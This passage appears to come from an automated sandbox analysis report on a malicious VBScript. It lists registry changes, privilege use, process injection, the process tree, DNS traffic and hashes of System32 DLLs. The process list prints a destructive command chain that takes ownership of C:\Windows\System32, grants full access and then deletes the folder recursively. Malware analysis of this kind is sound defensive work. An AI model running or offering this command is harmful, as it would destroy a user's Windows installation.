Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\System32\mousocoreworker.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Windows\System32\mousocoreworker.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\system32\backgroundTaskHost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\system32\backgroundTaskHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings\MuiCache C:\Windows\system32\backgroundTaskHost.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\mousocoreworker.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2992 wrote to memory of 5356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 2992 wrote to memory of 5356 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\cmd.exe
PID 5356 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5356 wrote to memory of 2708 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 5356 wrote to memory of 1960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 5356 wrote to memory of 1960 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\file01.vbs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c takeown /f C:\Windows\System32 /r /d y && icacls C:\Windows\System32 /grant administrators:F /t && rmdir /s /q C:\Windows\System32

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32 /r /d y

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32 /grant administrators:F /t

C:\Windows\system32\backgroundTaskHost.exe

"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

C:\Windows\System32\TextShaping.dll

MD5 4c528ae5d512e3901bacaa5d75240381
SHA1 c0222e0ed87b618a16564dadd485ce3a80b762e2
SHA256 b51bbe4c3d01ed3ecb8947c7cce071022149496d713e65e5a30cacaa82b7681e
SHA512 43dc844946160dd36cab13ee963b51a3af7d78fa07b46550cc7b4a6a68f1fc28efb9fc83729c5ddf4ef1c97b89e47a6735d8c13211e28c3a3d9a3fb895fa420a

C:\Windows\System32\ws2_32.dll

MD5 6eed88c1206032a2797abf131c6242cf
SHA1 2865c9ad28810c59f5eeed6f894467c9eb2c4ee8
SHA256 1f996574f38219cdd848375f517f8d86e17542bc84d64cce63aa0c64cc15f22d
SHA512 26ff0c48ce331e4d60b1933bc04043a5c5b761e2202652acee27c48a567ff25d11f3a0a49327e9f2d02bd656ce94506a5ff5880bb9ba07878e84784843bda4a6

C:\Windows\System32\ntmarta.dll

MD5 3847505289cb4d4454f8dc5a866338a8
SHA1 5a5db0243ff6c10865b1301712647bbb416d2b07
SHA256 b2eb064f3d70f08152e1845fbeef64be204fa44fa56d2e58a645e15db5505011
SHA512 776307a08c3d76216d69253c11b18ffffebbe872baa7574d96f79597370ead896d6e5ce3325a0f396bd5741c5afe90c60bf1aa3088146a439410043ab06f432f

C:\Windows\System32\CoreMessaging.dll

MD5 724677d5055d40798db093c26cefd179
SHA1 af685e51f87375125126fd6eaa67ad46eb519859
SHA256 c01c15c82a8568ba99bf193fbc4893d990102b0cbaafe04f4f02b9fe44ae6c76
SHA512 ffc56a4984c2eb7acd55531027c0559689305f4b5b9755e1c0338974bd4411f60a4bde16805e68005bbda96d491af8b70a4cdbfafc613978c72baacd3a3e56c6

C:\Windows\System32\CoreUIComponents.dll

MD5 556f907cce760f3589c953b34d98caba
SHA1 973210ee7824101e08ab1e166e2195b764993bf7
SHA256 27f6f85cce6be7a0127deca777e11f3adb4813b5182c287efdbdd74c0952a339
SHA512 2d1dfc5cb6d98bc005845fce619d593525f5acab9699defae8391009fb9164d550502c713031f553c2546ba90690c90828fc9ff7881407f03644a2bbacc0ace4

C:\Windows\System32\TextInputFramework.dll

MD5 c311e8923432d9d69ad118e1ff6501ce
SHA1 692b75a57c033b45c65272247ae7dd2061092ef3
SHA256 344dcbf81e506ad32561bee96221a601c2e714d136c6d0d8a2e03db8e2dc0e9b
SHA512 b629453abe584cb69c79072eef6c59a8b20cecdeb4bfcf0a2a709f135eb16612f8eb81039adc82669fadc41240ef64d1c7fc4025d3a600ffd7a3a85ff05cdf01

C:\Windows\System32\Windows.Web.dll

MD5 0e96fbf3f55bb988eda407e868c17ed3
SHA1 cd9ecc3a8b2984eb543cd1f7e10c9578b61619f4
SHA256 c5dbbfa0ff7d1c08ec9698e3e2d59634168c497dbda63a3734fb68973b999ac8
SHA512 493eec4a6da4678eb145beca6b9d6f78a3a9068ff20c428428331c635a1c25a2d21f204718a029f33a01c4a2bb702b29210acaab8dcb73b1d477749fdd35e6c7

C:\Windows\System32\OnDemandConnRouteHelper.dll

MD5 1f009de6a013a282d07436241512c056
SHA1 f0d37e1e76a199135e00c0a36b154b191a0950a9
SHA256 c897c345c3bcf3e96589a0feeea8b6d26cf33c091ac3ee2162dd27f8a79c3ff5
SHA512 57971d5df5bd9fad066378b280898e1f6e074805cc765448b99409550f97d74bf5bbd11e48e28e53f22be69cd9cd0ff58caa1e92f94fed7cbb4cd45c8f0c4d37

C:\Windows\System32\FWPUCLNT.DLL

MD5 b776a9db3a6d407d1dbd5d7af94f2294
SHA1 82e2e70dda3c8890ec7ab94a391e886afddeee09
SHA256 aaf5b3a2618636ad22724a37a56d325ef2b4c873e046dcb24cbfda8a34b15ad4
SHA512 ba002d9e7ab6634cb89ddb17d1edc0b7efd5f87a1200f313cb848ae777bb907952eaacb19b2889b0184d144e7ba8e07174b4677eac4b18bf2a0d2e9962193876

C:\Windows\System32\ntdll.dll

MD5 47ccb0e28d73f695c5d5266ffbb300ec
SHA1 63e6167944df951ad2d279d0b64e37bf2f604c07
SHA256 12d1bac765448db638adc8327de1101e5e2eb5829b8da7edd5b216a45c717eec
SHA512 8219f5cfd7a6bf28b8880529240e0b49a2fd78c0c5227cf6471cbf153fd32b2664ae31396d4b6897c2686e5b7826b9f9dad434e82e7032c7a5aa3ee9b2771145

C:\Windows\System32\BCP47Langs.dll

MD5 bfbd39131ba2666075d7c20ba46972fe
SHA1 66c3f540b52b101893d4ce046763817d44beed88
SHA256 cbd179179f1d6e4c34c25abca5999cf5c2b468ba267b5c32663451991452afce
SHA512 111cbc28a4792b7a461fbf1dba0286c58e8aeeae80958e30827d475784eccbff670d424cb7cb610c44c2473b7df7d3ac61cdbda43ffe64d710a2795a6f4f9620

C:\Windows\System32\Windows.Globalization.dll

MD5 c4380ccd6a91a93a8e80bf89776f8851
SHA1 4e97fa0e4a7cb6839bc0a36f0201715be3f2571b
SHA256 48ed1080edea0f01223ef21cbf3b29c96352b649d8995d19722c59d5ad713301
SHA512 217d2d288e10635335fee5f13cb0c1703672bc0ac5f08cfb2f5e3f285ec8529e91e4776c7094a40268495ab044e61b85c14ea5f235a847d7b9ab2b9234353f3a

C:\Windows\System32\iertutil.dll

MD5 41f1fc3ccd219c58d2ed91a0213f6693
SHA1 72bb4bbf5dbe64993cd005407c565264a7388879
SHA256 a40de7fda4a60b9315d1a50453eb2eac2e3e720490239510e213b0e9959db76c
SHA512 cdede15a88103a4922c932b0a0208b32da88b51fcb2a1cb87db237b413cc42821705ed29f253827af7e4cb435ca8886b8bbec2b97240ffa100cba880a584b56d

C:\Windows\System32\uxtheme.dll

MD5 77b94683930015f413c0479f4f21e8f6
SHA1 e5703d9697da0d23023980847a48eb3e49f22458
SHA256 8080001033997f644aceb6a08c9a8fb445a9e338ec3202fa819936dc71f06367
SHA512 57ca6c40b9c5848fc5aa5e3df73249af41dfb09e3b84309807b6a84385cf7d4324cf831872e42ce456fc1302eccde3aeef8feebb57aa451811540fac25545924

C:\Windows\System32\Windows.Services.TargetedContent.dll

MD5 f9a5fbcf0af5f280e5e66bb76961cd2f
SHA1 78a7b1ceb6cbd72e06d48a0bef9d3facf028d8bf
SHA256 073703495bf52dbd3e5b174bb5a2ab02f36b8b73ff387fd7c5d2879a829fec00
SHA512 3e8cde5ea4883a47f6ed0f08c8e093859896cef776eee552acbc17e4b34395c007e3be875f67eda1cc4aa9ccd12d286a417a9aa4fdf4629a212c983ea5e29a72

C:\Windows\System32\profapi.dll

MD5 4a7468ff74f0114626b2f7d1dd5d9fc7
SHA1 0094c51ce445d9986ad3a74959c47c7ec4e25504
SHA256 313cb7c9a69d5d84308a1c4b78c8ff257854071cac7918bc31d1b893feb95ec2
SHA512 f9ee2bdb3158ea7920e241b192a62c5bc3ef612b171bc75e085019e3a2139a5987b2c280cbccc49900695cb667887ac5229506d314d492e4039a9d28027d89f0

C:\Windows\System32\profext.dll

MD5 a5a2db4e33eba0b1387aefb0a6cd0574
SHA1 bc4916d5a5c053fa0ee01e341d4962cd7049e6bf
SHA256 43fd290cbb3b4507e6eaac48c4fd13975252c6b388c9affa7808b1d23c212b04
SHA512 52195b797ea4e27c26e709b90b4fb70ea83745774607aedf23a0fd0e79a7ff8ea7423f7884675b6008fe1195d6fb5f7349b78297e4e3030f720256ef8a38fab8

C:\Windows\System32\userenv.dll

MD5 6331627f363f17f1b1d28c4fe3fb433b
SHA1 31ab07ef67ba94c1d219235ca7db246b3d0f2fe2
SHA256 de6f6cd7d703dca17c147b358fb0ded9b763c5642c56dca0280204a8d3e2cdc3
SHA512 26affaf64593cd41b970310f91f9ba445d78a01afe373bef6c644c9eb6357671d3a6c1e210981ac43eb1d0d3d33687595885f52c37dfc2d47e6930fa65a9531f

C:\Windows\System32\bcrypt.dll

MD5 a4be5153c4441ffeda74aa99d4b2e830
SHA1 fb5de507fc8cc3622d225cb3f5e551c98dc10b51
SHA256 0f14bb6286686143d6192376c2f965d7e71a0c3fae73773da56a7fcd5e355f4d
SHA512 a2e1bee101cf045875654be42366ac02dd06a3aa4d85495290b99bb60c5b3a7aaaa39dc17e7823a07d08bbc4757b49062a2682573325dd9315dae6c393b07aad

C:\Windows\System32\threadpoolwinrt.dll

MD5 a0dea5c1f4ad089439054c8c0ae8c8ea
SHA1 5f7f1fb7dc8822573ba9130fc5395ea8d94d0258
SHA256 192e53a11e563333ea528dd2682bf97690f7d9b4b15dfb8fd111a39980a513ec
SHA512 e3632430f46fe2cda4f7db81e93deb0bc9b1ebb8ffd25d6fee5a3bdf3c8036c0d1374b729c06ed42c91aee2f6b34765d1552ee8ece357753ec984bd64a6aaee5

C:\Windows\System32\logoncli.dll

MD5 5bb04a7a8c4035ec97eb0acc36e6fee4
SHA1 16cb991a12c1a1d93eb5ff5293b6048c2350e04a
SHA256 b84469293584b8ff2c0340f48535227d4c383d558bcc30d6e16a292d26f51cb5
SHA512 b8d6f3baa6d7694d4c730f36e236c5ee5606479116e86177d36ab22bae460a85e26239a4619c0f1622b2bb6ebe2918f3a85844a043dd868709918c19e871d0b5

C:\Windows\System32\Windows.Storage.ApplicationData.dll

MD5 7bc1a26dd9bd33c8849559fd0d2f7239
SHA1 42e6793f073211ab3921756358df719c104516cd
SHA256 febb8ae767b2e5d305f4af6a15ea54aedbf0901dac925382b387eda187cf596d
SHA512 43ad5a310a73651581faad312cf83909ea1e9b43b4cb0f8a9a787b3791433c980133ad68e04be029991eaaf8803a6ef3f3f00c9a512ca54168692a336d995f1e

C:\Windows\System32\cryptsp.dll

MD5 a26d9bd5fe9f31f2d47f81ef95876749
SHA1 03aaa61cfdd8c9830383dee534fc984ef0b815f7
SHA256 82027b8c6ce412f9c9731af5e904291dae944c3845ebfef2af86c8543c8ad5a7
SHA512 8fbe40e851826646bef6e3becc5a5a8ad64bf0e1f3c4c77c133a76491401fc0906d442f41a0c609b7f6c5ffb8cd2a8c9eddd63c135ed38de7d6b81b7d288b2c5

C:\Windows\System32\dsreg.dll

MD5 820b56add74a9ed99409a93f36796f3f
SHA1 04de71d9696c72d559c7203bda715aed223e9a31
SHA256 7fdba9b0590474274895252dc78675b7f8eacda80baf211f45a7d9ab9801b42e
SHA512 63417d78ca32b2e94973ce97d2d9ca08f192411be758823c7a2cac4980dfdffa0150c94b442d484f3c5d65eb5937cd0b5d60a14dbea84248da1e973e1fc7292b

C:\Windows\System32\propsys.dll

MD5 b5b4006acf4d06112dec1d2d3e86c431
SHA1 0fe3f7f5ad40e9b902f4438f55cdcfd9fcdb5cb0
SHA256 bf1a5b4b8178c8092347e0c977e0b1bc11a287f703d5ecf68575589ddc6655f8
SHA512 0249f9fff40a135356120e9a7eb8ae3db0904ba0554bda125b20c264c1e93f4960fd713b7ca8d7c02202034ef0d0bd623bdf558834ed21ad5630f36036b38f45

C:\Windows\System32\cfgmgr32.dll

MD5 1aeb3524cc1162f97a87ee77810d0c1f
SHA1 bae55961b55a36ff0b74edced581219c1d0d9c0b
SHA256 cb82c3b7c8734e891ddcb08c7890599e563498bcb645bb15cbf819fe8a88e3d4
SHA512 8afeb136712197a3285c96caccb0e6aff53fc7bb25e82f3cc31911b6d14e4fe5f72418d69ae88c3b3da36759a1c00c54afc6c01b7536f5033dfbea76ea7bcbf0

C:\Windows\System32\umpdc.dll

MD5 8cdd866e0707a71952fba8be899b7512
SHA1 25635102c3159c4ca42e802492fea502316054ba
SHA256 ab37401f78b29cc26db5b27b3dc0cec3c37ce99ad4e9df6ebb54f4a239f30232
SHA512 51225b22a143fb390116112499e5c10c2ffabcc1c582a0f8e04d7c913cfcb75f79bb1dcb5310408dce81389c22dec00eef5bb4df6fcf4c7c76de141ef8ef28f9

C:\Windows\System32\sppc.dll

MD5 1a344a53306779abd7a3242f7521ca19
SHA1 93105d0b684532fd5ae8f302497beec84891087a
SHA256 63acba2d7b1e0ff51b1fb5eddac20b89e7d47051a4d7e3180da4f99ecca8ae32
SHA512 d622a97d475094d0043b49bd34ebb8a1ee7f89701715ad147f172a6809dedb8d11331ae11a860dbcbe108dcfc643f5d6f5673b2b8847c9ff1e03dc06a70fdf43

C:\Windows\System32\crypt32.dll

MD5 b7c42e5bcdc5bf82b294171a22654473
SHA1 3b0075817ac0a6c38b403d5b19ddf919f96a19f2
SHA256 751b8a2acedbc7c735146272e985d121e17936383c5ca1f326cca3bd64113b01
SHA512 263337d0d3b4d2fb58b91ea3563d06b322a4c369f0c0500e2a19c370a9dc0463d67d57857a28dc0e15f81635af17503285aa4fb08a5d8b40199610e4eae5f503

C:\Windows\System32\msvcp110_win.dll

MD5 f084efcd67d2deee55137ee8fdfce0a9
SHA1 b6313cbcf5a220efae747eb19ecc5f116cdeeeda
SHA256 625cf50cd7fcd0e16d0e28514e92919b6ebfb9cb07cd1803110fdb0f5368aca4
SHA512 11dc12e31838a05dfab4bd0f8e3a07e5ab6a1950ff780049ea7cefdceb14df92b6de2c9e8c8153f036b7bb19ff96a3da343a7ae9d97c5479ff3e07d47ff022d0

C:\Windows\System32\wincorlib.dll

MD5 61f81db6484c0e94820ad6f8bba5a03f
SHA1 167e549bf81e0c9d27f8481ce4904d8627549e1e
SHA256 d8dcc13ee3c37d6412c120a6370a15ca3d103571f7681fefb06709d8191f95a3
SHA512 7634db3a104d3ad4ef9970cc506111d58c5ff39f9affc27abeab6556b1c1dfd4b0e2e7580e9410c2520cf6cc3d75f8f8e9c0bfd8f2980cec8dcec88e6a7b68e3

C:\Windows\System32\cdp.dll

MD5 6517f92fb018d4ad823ac6f468129ebd
SHA1 6975e2a549127ac9016ec4697213fddfff518db2
SHA256 e88d8f8c3a4d1e836e1b8bc802dae6acd04c655f371ae9976e1ca7e45faf5921
SHA512 47458c9d20218c21a841ae32d418a3a038cad355a3fc779e1ec950c618acaa68b13cb3c2d79d5f34bd1c46eff5aa3494fac0eadb1faf8b9730fba0edaee38f56

C:\Windows\System32\wldp.dll

MD5 61f961a945669430557457615cf53493
SHA1 5b12fca5bf3ee6d0bafc18f96dc81604bb95de4a
SHA256 08225860b8e9b712439cd83bc3a04fa802c56c5fa6c2471f23e0047ac639f1f5
SHA512 a89e09a2897e496b39ca6f6b30e4545c195b4524936b4b184fe2a65aac1901de6c522c1eb573954b4279c008e2b7c030249f87f327379735c393ac4e44cff6a2

C:\Windows\System32\slc.dll

MD5 4f6f869094d632eb65e88ca037986aa3
SHA1 681b0201ca12047db8768462497be8aba49fea29
SHA256 a68d1f8265d6a1175e55283a6f57b96ac94bad9585d19d3d56f8d2c6d4c92df4
SHA512 1d292560d7c91c4922113181ae757f15e61c43edda5daa68e83f946c9abe5d05272adcb88a2e90592adb002148a6cf924c0478c4008edd4addf56d6d3f4e3f3e

C:\Windows\System32\policymanager.dll

MD5 1500d26519d73ae1b997421081459a38
SHA1 5d1dead9ef60c8b47ffbace82794a8d6a2be29ee
SHA256 52fa7c1da3158a75ead78d2e011cdf98031e25521b5b369d23b2c3a53365264b
SHA512 4cb99bbbdc8b3ecf200aff69e4dd8a82b590848da238d37c2e44e30366a821275c43e567043eb2dd068d494da464dcb7b3816d04f044743718ec6b5f353e8eef

C:\Windows\System32\sspicli.dll

MD5 956ad5a3683b1d05ecb2927114682495
SHA1 1c241020754267181dd501949e0d43f35f0a4d10
SHA256 74542c85c237583a61bfd6296e7610da2973872645ddc614ad837705d9c4ac72
SHA512 39b691f216778a42eb8351cf84222c42d8bee81ad5ddaa480dddff36c419778abd63d08cc09a431df18b37fca4f98af104dc8ab7967b5864c90b77474f377a94

C:\Windows\System32\advapi32.dll

MD5 e70a1568a400e71a8e644652fca4c925
SHA1 6cc13f29c70b41326832b2145e134568e5d9a3a7
SHA256 e92f9f71ba5a405c5d1a51bd03d6f830f004aca05b80b5bcf525514eca4480ef
SHA512 55863e94e2215b3016df306915bfdbf85486948cd6b1f08e924b7f14539f1ad8fe9a8bd88226fb73f2ce2811196bf48cbff05ecdb8fb3e6ca7cf22f28451fa67

C:\Windows\System32\Windows.StateRepositoryCore.dll

MD5 33ec12ec93e56828f391399b70c313cc
SHA1 d3517663c67a63872da7ddcd93c13909d7a8d384
SHA256 25970a13ecb42814709f5a17c3e41f389dc27f33e0e7a46300e47f5af2fa0f5c
SHA512 4b1314c365f92c5e9881afe27f49b8ec9251c3810aaf34202ef6839bd74a31d8c20545ad414f9eae239a43bbd0d1f3a9deadcf08f83e45ecce54455885b62758

C:\Windows\System32\oleaut32.dll

MD5 eab5aded2242feaee371ed5cab6ea919
SHA1 d9d46f3be08dd8b988b873c4e034c622bc0fb119
SHA256 bbe70836e44ba71555906d37011ec2aa3f86bd1314f5431406bba8f305dfb570
SHA512 44debfc49043003a3e95af09e6687783c55f31009fa4d156218f70fc4ec41f1f086aa1eaa2a5b044f8d1982554a3be525625c28ca617b9db19f0558b27559c7c

C:\Windows\System32\biwinrt.dll

MD5 7c2e41da3cebbce1706bf883c1a55a0b
SHA1 16b3fd17ee2ad8d3abe161735e972babdd76fdb5
SHA256 3b7c5fd6920f53c0aabf31e990c4274a98f094ab2d304a0a46329e2fcca16b43
SHA512 e6a0f16a8e555dad01c5424de8617211acacfd1673660bc9004dff06e674f28ba88e3fe0a7ee8ddccee0eb713de16beea820fe066a894c648d6c82fa933a6609

C:\Windows\System32\OneCoreUAPCommonProxyStub.dll

MD5 5af757db7d611890257f5066af309e9d
SHA1 d0d1371afd887a1646131c70964fb2d735904519
SHA256 503ef212dbb78c886aacd2ea956004bf213061761d0174e3711a626f9d774471
SHA512 13f3430bb5d331f879cbaeea3e2ebe67bdec53dafe35596c828063e98d137786149bcd09c16f4911b430ad7ce697ae2c40fdcf2f9e6cc9bede52adc1ce82bde0

C:\Windows\System32\MrmCoreR.dll

MD5 dccfefcfc583aed573452b4168363620
SHA1 3422aeb088d5eaba6d616313d8c5fe0c8f58c376
SHA256 50822375d13f39dfbb3528025d9faa98f22836f97d11f6e0e7b447ef9e4534df
SHA512 a3ea0279add3964f2166af0963e7edb5a298afef7b03006ee55433cef774f1fef82d0545c2bf04ea7ebf9d1d7fa17f845b73ecba483cac5ba2f891e6c54f0d6c

C:\Windows\System32\imm32.dll

MD5 669d9741e74156425354ddab8bcc581e
SHA1 3384654e76559fc6900e58296967ed89757ba8c9
SHA256 00053aa7be3825828ad7c8c1c9f9ad29df07f5538107479886d8427df86bb4f0
SHA512 b520fdae3489202e532e11c73309f5b2a960f202a5872d25377ee2622846066eaff54fca61930426250787e55f243e30430dd6d3ffad004e318c6e6ed597921e

C:\Windows\System32\gdi32full.dll

MD5 35e1a13f6a0902b4c89f59c89b355c86
SHA1 0375b9e121f10c2d201c2f49c1c014723ccfcacd
SHA256 f2f28c7195557af1e6d50016b41839514ea2dcd4716c5c5bb87dd2c200e5499e
SHA512 de155aceace2ebd4a4421eca43a4787faef8371ff0349a3861c480ab7ee56ae43169e34600ad1d52d0342c71dd247d0a589f6ee96cf93c77394c92e88f58cc78

C:\Windows\System32\gdi32.dll

MD5 f1590bdb1c95293cd3b487ffc97353e0
SHA1 9b3c7713828bda35bb3e4f30a56d61a2c19811dc
SHA256 de75aea74bf6453f42f02b949a6a3dc00ecef4ae16310fc4a0acb6d869e1fd2a
SHA512 5be29ebe010ee79508f806680fb60851d90262877c3f9c24ab56aea3e3d5e0428764f364b0ec592fd7c3daabdf82976ee4f6530902c99eacef4a3c396952fbab

C:\Windows\System32\win32u.dll

MD5 1fb6e05a75de3ac92adfdbf8f8dd2bae
SHA1 5627fd2027f52276b790c2c4a6ac39b5f370728b
SHA256 f9f54817d8174c8cefecbb36c1c001d8a088bfd87d769d38f2dd0b5108c668ac
SHA512 a26f4a1583e77e0d2b8085813b40b17e5e007dde602f92a1e0d736c41b1adf56bfa0a5bd4715dd281cf7acc33d034b8dcccdbf71ceddca8a8082368181881eb4

C:\Windows\System32\user32.dll

MD5 f804d60514ec31233e6df99949b7ff1e
SHA1 96d48b58e741a33d6729d4d2ae57f7f52a0d4961
SHA256 a1331a9b4c8cca6ccdda97efa7b57fe249cb1753b0ee9c212a41856866c21b23
SHA512 fa60f5ea399a316946dd35c0c346ff6cf19e76d905055f4473f11edd47dae937efe2482ef4a0bb435aaf68d4aa29ead23c538231f66d2a58499d79547341f58a

C:\Windows\System32\SHCore.dll

MD5 ab4b87457d2b08b7c51b136c05bfed27
SHA1 3fab36a2f84c75232115d3f253c1a9e7f087e7b5
SHA256 79e0e627e4e8b0a34375db8c71592977538e9743cc67adf88c615157a0e86b00
SHA512 37e8d142ecb1112b25e54cdd10a56b972a435397f2c6dfbb209331181eab68db997a3d2a781581d4b59a66d87ccd22e02300a4112a6223f29fe72e860cd2c4aa

C:\Windows\System32\WinTypes.dll

MD5 67970fe93f3437104cded90945141539
SHA1 e2fbcbb3a26ffad184727275fe2753a8c1ca30e6
SHA256 62a4076211bae3db99472ceb1b0af23dfca8aacd618a3b72420182bb0c7ab2c2
SHA512 43896a744ef8321ed3161bbf55117206eddbb0948e551d112ef028759ebc5b56b78012458dcb98a324bd6ba52c2ab5b063ddc7417bf2b92179e829898c724487

C:\Windows\System32\msvcp_win.dll

MD5 34692d0bde33641b576c32165fbaaf6d
SHA1 09c6a238c7b2936207f261562079a327aa9ff34e
SHA256 fd1d0cc8a5ac8bf20af9e1a7ec360dd76dc022dfe992556948df1c17f7a714d2
SHA512 7d65519f50fd61b08fe7f676ff98a526c469dfc045c15a92c13d2e2227d41cf2c5fd4bbff4d15a6da22840be4bd7ed02fc03bf96905787e7356eaa0066bbbe47

C:\Windows\System32\sechost.dll

MD5 e127fce942c28931ded1442a1f2e84bb
SHA1 2afe30f581351040cf0f6c721fcd33cc285158e9
SHA256 f900de6143d808a03584075417940c5d42bcf612811a19129059a696be8645d7
SHA512 c6eea30c104cf775a2732492226570bd9cecd65efbfc8f33ac9fae1c2584f8bc0a3121b5dc3566049a8f12aa1260ed002ce39d8b0c996a17c139960d1b20c248

C:\Windows\System32\twinapi.appcore.dll

MD5 17bfa6a3976985873eac662f03341cec
SHA1 a06acef0a8fac114709f9fa61ed079724559bd9b
SHA256 73dcb1aee444575b40f189b90af2058664a4ed5e1bfc6f13f5ed925550292732
SHA512 19953627c1bdb87581d18cf0ed85b5091a2c42a43ad115d2d72a13d609f36bfacfb25e3a560e7f6be975021bf091ecc3672a5e8f97f35bc61ee8e59f6fdfcc26

C:\Windows\System32\bcryptprimitives.dll

MD5 5204c0caa08dfe32b8423136f5f5668b
SHA1 ab5211d347e77cbbc1e732106f32de3de8307bef
SHA256 cfbfc6e742fbba525b49fc1d650003ca4fea1ae632c3d265ea008f3d6eae5d0d
SHA512 943d0406ed16b0cf4b34d47188988d7c8235e431a4cf17e1f5fa11c032f66ea575e54c404fb944f7edc595ead9487934333e5db8c10a494437356820d2c24dbd

C:\Windows\System32\kernel.appcore.dll

MD5 af68fddb20df61ece812b542176949e4
SHA1 cdba1cc8fd390b4f8101b5a22b0aa0ba5605c7db
SHA256 7d6c60195dfb05eec27377ae25d9ad259d7fdf85fa71d2aa855fd4129c2aadc2
SHA512 dbc0b91ac07a640f2c8e6bbb76d95b29199970d282be1aaf9d31e965a3d071440da55862d5f949349a92f86cd3e7a69d9b3cc346fae7fb67089af99f3b038bee

C:\Windows\System32\rpcrt4.dll

MD5 dc0b01c678d532758d2b1fac1566f89b
SHA1 b35fdb8d452e39cdf4393c09530837eff01d33c7
SHA256 c84bbd6d2e4f0334d75d6199133515fce3d44439062095f0dcfd1f8df0f5183b
SHA512 7a898d3ef8ade5047ebe59ba1aa3a82ccd6ac0d12ec0828726dc49ee2791c2c12188052893e208374040c64f26c905fa08363740327735becf9b2fd79e3792f0

C:\Windows\System32\ucrtbase.dll

MD5 2c8fe06966d5085a595ffa3c98fe3098
SHA1 e82945e3e63ffef0974d6dd74f2aef2bf6d0a908
SHA256 de8d08d01291df93821314176381f3d1ae863e6c5584a7f8ea42f0b94b15ef65
SHA512 fb08838983c16082a362b3fc89d5b82e61ae629207c13c3cb76b8a0af557ad95c842ce5197ae458b5af61e5449cbab579f509fa72866308aa6fbd3d751522d0f

C:\Windows\System32\combase.dll

MD5 b1e221f0f19f7a1e56cddc254e8ca5c7
SHA1 490c54ab441f11b64dda968bba5523b9cf87176e
SHA256 4d4f893a1e260c4e9e286eb9ab4ac3e9b356495da05b691fc40e65056767a7ab
SHA512 58134ac9cffbb08b24efea681138d53489f7d511ec4098d33bb7b003968e851b5bf17b84f85b83b56407682ca0bc2354a8e388f05da1a9a24435490fda5b3977

C:\Windows\System32\msvcrt.dll

MD5 a4f2d5942fb447cd48a5cee414983e85
SHA1 5aff4cfdee689f127df3c555281dc629d4d62318
SHA256 dd7c8bc34cdbe30ef921395e874909bbf6be53803822164f75f7207e9f085650
SHA512 c464ddc6aee00721fac488256f4ad643634c439558b9ab5f974be9633961a69c99830a308aabeb91e930ddf0d527cd0d328a9aebf1fc2e807dfa2cf02abec3bd

C:\Windows\System32\KernelBase.dll

MD5 957a7c72c0ad30d568e04fce3313082f
SHA1 1919c89186b1e3b4da4aea812ea43f02eac28cd6
SHA256 79eadbc61d0762e6931ee5e49007898596ece6bc2a61c080ada7a2c70992d6e6
